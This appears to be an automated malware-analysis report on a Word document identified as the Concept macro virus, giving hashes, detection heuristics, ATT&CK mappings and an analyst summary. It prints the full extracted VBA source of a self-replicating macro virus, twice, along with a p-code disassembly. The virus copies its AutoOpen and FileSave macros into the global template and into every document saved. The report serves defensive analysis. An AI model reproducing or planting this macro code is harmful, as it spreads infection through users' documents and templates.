Concept Office (OLE) malware analysis — malicious · fae9cc8813c7a742

MALICIOUS

Office (OLE)

41.0 KB Created: 2000-01-01 22:05:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 9c99c254ad2d7d45d8403d7d001de5e8 SHA-1: 89c30825d52191f4fa8eee41090443b6940bbd9a SHA-256: fae9cc8813c7a742ea452297393203b6856146eee05512d9b9840ee228438fdb

140 Risk Score

Malware Insights

Concept · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV detection and high OLE_VBA_AUTOOPEN heuristic indicate a malicious document. The VBA macros within the 'macros.bas' script, specifically the 'FileSave' and 'ClauFS' subs, copy malicious macros like 'ClauAO', 'ClauFS', and 'Clau' to the global template, effectively infecting it. The 'Clau' macro displays a message box indicating a macro virus. This behavior is characteristic of the Concept virus family.

Heuristics 4

ClamAV: Doc.Trojan.Concept-28 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Concept-28
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8844 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8844 bytes
SHA-256: `26554fa6f7e34f8e4ada3010689f86bc3e1c75fe97f1623db7a6d9a5dba711bb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Clau" Public Sub MAIN() Rem Este destul pentru a dovedi... If WordBasic.Day(WordBasic.Now()) = 1 Then WordBasic.MsgBox "Felicitari! Aveti un Macro Virus!!!", "ClauMacro-001 Virus from Romania 1998", 64 End Sub Attribute VB_Name = "FileSave" Public Sub MAIN() Dim cMe$ Dim c2Macro$ 'this becomes the FileSaveAs for the global template Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False) On Error GoTo -1: On Error GoTo bail WordBasic.CurValues.FileSaveAs dlg WordBasic.Dialog.FileSaveAs dlg If dlg.Format = 0 Then dlg.Format = 1 cMe$ = WordBasic.[FileName$]() c2Macro$ = cMe$ + ":AutoOpen" WordBasic.MacroCopy "Global:ClauAO", c2Macro$ c2Macro$ = cMe$ + ":ClauAO" WordBasic.MacroCopy "Global:ClauAO", c2Macro$ c2Macro$ = cMe$ + ":ClauFS" WordBasic.MacroCopy "Global:ClauFS", c2Macro$ c2Macro$ = cMe$ + ":Clau" WordBasic.MacroCopy "Global:Clau", c2Macro$ WordBasic.FileSaveAs dlg WordBasic.Call "Clau" GoTo done bail: If Err.Number <> 102 Then WordBasic.FileSaveAs dlg End If done: End Sub Attribute VB_Name = "ClauFS" Public Sub MAIN() Dim cMe$ Dim c2Macro$ 'this becomes the FileSaveAs for the global template Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False) On Error GoTo -1: On Error GoTo bail WordBasic.CurValues.FileSaveAs dlg WordBasic.Dialog.FileSaveAs dlg If dlg.Format = 0 Then dlg.Format = 1 cMe$ = WordBasic.[FileName$]() c2Macro$ = cMe$ + ":AutoOpen" WordBasic.MacroCopy "Global:ClauAO", c2Macro$ c2Macro$ = cMe$ + ":ClauAO" WordBasic.MacroCopy "Global:ClauAO", c2Macro$ c2Macro$ = cMe$ + ":ClauFS" WordBasic.MacroCopy "Global:ClauFS", c2Macro$ c2Macro$ = cMe$ + ":Clau" WordBasic.MacroCopy "Global:Clau", c2Macro$ WordBasic.FileSaveAs dlg WordBasic.Call "Clau" GoTo done bail: If Err.Number <> 102 Then WordBasic.FileSaveAs dlg End If done: End Sub Attribute VB_Name = "ClauAO" Public Sub MAIN() Dim cMe$ Dim cMacro$ On Error GoTo -1: On Error GoTo abort 'add FileSave and copies of AutoOpen and FileSave. cMe$ = WordBasic.[FileName$]() cMacro$ = cMe$ + ":Clau" WordBasic.MacroCopy cMacro$, "Global:Clau" cMacro$ = cMe$ + ":ClauFS" WordBasic.MacroCopy cMacro$, "Global:FileSave" cMacro$ = cMe$ + ":ClauFS" WordBasic.MacroCopy cMacro$, "Global:ClauFS" cMacro$ = cMe$ + ":ClauAO" WordBasic.MacroCopy cMacro$, "Global:ClauAO" WordBasic.Call "Clau" abort: End Sub ' Processing file: /opt/analyzer/scan_staging/767475e69bc64afd9f1333bb225a0612.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 965 bytes ' Macros/VBA/Clau - 1171 bytes ' Line #0: ' Line #1: ' FuncDefn (Public Sub MAIN()) ' Line #2: ' Rem 0x001F " Este destul pentru a dovedi..." ' Line #3: ' Ld WordBasic ' ArgsMemLd Now 0x0000 ' Ld WordBasic ' ArgsMemLd Day 0x0001 ' LitDI2 0x0001 ' Eq ' If ' BoSImplicit ' LitStr 0x0023 "Felicitari! Aveti un Macro Virus!!!" ' LitStr 0x0025 "ClauMacro-001 Virus from Romania 1998" ' LitDI2 0x0040 ' Ld WordBasic ' ArgsMemCall MsgBox 0x0003 ' EndIf ' Line #4: ' EndSub ' Macros/VBA/FileSave - 2137 bytes ' Line #0: ' Line #1: ' FuncDefn (Public Sub MAIN()) ' Line #2: ' Dim ' VarDefn cMe ' Line #3: ' Dim ' VarDefn c2Macro ' Line #4: ' QuoteRem 0x0000 0x0033 "this becomes the FileSaveAs for the global template" ' Line #5: ' Dim ' VarDefn dlg (As Object) ' BoS 0x0000 ' SetStmt ' LitVarSpecial (False) ' Ld WordBasic ' MemLd DialogRecord ' ArgsMemLd FileSaveAs 0x0001 ' Set dlg ' Line #6: ' OnError <crash> ' BoS 0x0000 ' OnError bail ' Line #7: ' Ld dlg ' Ld WordBasic ' MemLd CurValues ' ArgsMemCall FileSaveAs 0x0001 ' Line #8: ' Ld dlg ' Ld WordBasic ' MemLd Dialog ' ArgsMemCall FileSaveAs 0x00 ... (truncated)

SHA-256: 26554fa6f7e34f8e4ada3010689f86bc3e1c75fe97f1623db7a6d9a5dba711bb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Clau"

Public Sub MAIN()
Rem Este destul pentru a dovedi...
If WordBasic.Day(WordBasic.Now()) = 1 Then WordBasic.MsgBox "Felicitari! Aveti un Macro Virus!!!", "ClauMacro-001 Virus from Romania 1998", 64
End Sub

Attribute VB_Name = "FileSave"

Public Sub MAIN()
Dim cMe$
Dim c2Macro$
'this becomes the FileSaveAs for the global template
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo bail
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
cMe$ = WordBasic.[FileName$]()
c2Macro$ = cMe$ + ":AutoOpen"
WordBasic.MacroCopy "Global:ClauAO", c2Macro$
c2Macro$ = cMe$ + ":ClauAO"
WordBasic.MacroCopy "Global:ClauAO", c2Macro$
c2Macro$ = cMe$ + ":ClauFS"
WordBasic.MacroCopy "Global:ClauFS", c2Macro$
c2Macro$ = cMe$ + ":Clau"
WordBasic.MacroCopy "Global:Clau", c2Macro$
WordBasic.FileSaveAs dlg
WordBasic.Call "Clau"
GoTo done

bail:
If Err.Number <> 102 Then
    WordBasic.FileSaveAs dlg
End If
done:
End Sub

Attribute VB_Name = "ClauFS"

Public Sub MAIN()
Dim cMe$
Dim c2Macro$
'this becomes the FileSaveAs for the global template
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo bail
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
cMe$ = WordBasic.[FileName$]()
c2Macro$ = cMe$ + ":AutoOpen"
WordBasic.MacroCopy "Global:ClauAO", c2Macro$
c2Macro$ = cMe$ + ":ClauAO"
WordBasic.MacroCopy "Global:ClauAO", c2Macro$
c2Macro$ = cMe$ + ":ClauFS"
WordBasic.MacroCopy "Global:ClauFS", c2Macro$
c2Macro$ = cMe$ + ":Clau"
WordBasic.MacroCopy "Global:Clau", c2Macro$
WordBasic.FileSaveAs dlg
WordBasic.Call "Clau"
GoTo done

bail:
If Err.Number <> 102 Then
    WordBasic.FileSaveAs dlg
End If
done:
End Sub

Attribute VB_Name = "ClauAO"

Public Sub MAIN()
Dim cMe$
Dim cMacro$
On Error GoTo -1: On Error GoTo abort
'add FileSave and copies of AutoOpen and FileSave.
cMe$ = WordBasic.[FileName$]()
cMacro$ = cMe$ + ":Clau"
WordBasic.MacroCopy cMacro$, "Global:Clau"
cMacro$ = cMe$ + ":ClauFS"
WordBasic.MacroCopy cMacro$, "Global:FileSave"
cMacro$ = cMe$ + ":ClauFS"
WordBasic.MacroCopy cMacro$, "Global:ClauFS"
cMacro$ = cMe$ + ":ClauAO"
WordBasic.MacroCopy cMacro$, "Global:ClauAO"
WordBasic.Call "Clau"
abort:
End Sub

' Processing file: /opt/analyzer/scan_staging/767475e69bc64afd9f1333bb225a0612.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/Clau - 1171 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub MAIN())
' Line #2:
' 	Rem 0x001F " Este destul pentru a dovedi..."
' Line #3:
' 	Ld WordBasic 
' 	ArgsMemLd Now 0x0000 
' 	Ld WordBasic 
' 	ArgsMemLd Day 0x0001 
' 	LitDI2 0x0001 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0023 "Felicitari! Aveti un Macro Virus!!!"
' 	LitStr 0x0025 "ClauMacro-001 Virus from Romania 1998"
' 	LitDI2 0x0040 
' 	Ld WordBasic 
' 	ArgsMemCall MsgBox 0x0003 
' 	EndIf 
' Line #4:
' 	EndSub 
' Macros/VBA/FileSave - 2137 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub MAIN())
' Line #2:
' 	Dim 
' 	VarDefn cMe
' Line #3:
' 	Dim 
' 	VarDefn c2Macro
' Line #4:
' 	QuoteRem 0x0000 0x0033 "this becomes the FileSaveAs for the global template"
' Line #5:
' 	Dim 
' 	VarDefn dlg (As Object)
' 	BoS 0x0000 
' 	SetStmt 
' 	LitVarSpecial (False)
' 	Ld WordBasic 
' 	MemLd DialogRecord 
' 	ArgsMemLd FileSaveAs 0x0001 
' 	Set dlg 
' Line #6:
' 	OnError <crash> 
' 	BoS 0x0000 
' 	OnError bail 
' Line #7:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd CurValues 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #8:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd Dialog 
' 	ArgsMemCall FileSaveAs 0x00
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.